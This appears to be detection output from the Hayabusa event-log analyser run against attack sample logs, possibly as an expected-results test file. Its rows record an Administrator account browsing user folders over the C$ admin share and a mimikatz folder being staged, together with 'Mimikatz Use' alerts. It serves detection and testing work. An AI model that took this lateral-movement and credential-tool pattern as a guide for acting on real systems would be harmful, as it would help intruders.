+2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Favorites\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Favorites\Links for United States\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Favorites\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Favorites\Links for United States  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Saved Games  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Searches  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Documents\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Downloads\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Recorded TV\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\mimikatz_trunk  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\mimikatz_trunk\Win32  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\mimikatz_trunk\x64  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Documents  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Downloads  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Music\Sample Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Music\Sample Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Pictures\Sample Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Pictures\Sample Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Videos\Sample Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Videos\Sample Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Recorded TV  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Recorded TV\Sample Media\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Recorded TV\Sample Media  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Desktop\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Documents\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Downloads\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Favorites\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Desktop  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Documents  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Downloads  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Favorites  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Saved Games  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Desktop\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Documents\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Downloads\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Favorites\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Desktop  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Documents  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Downloads  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Favorites  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
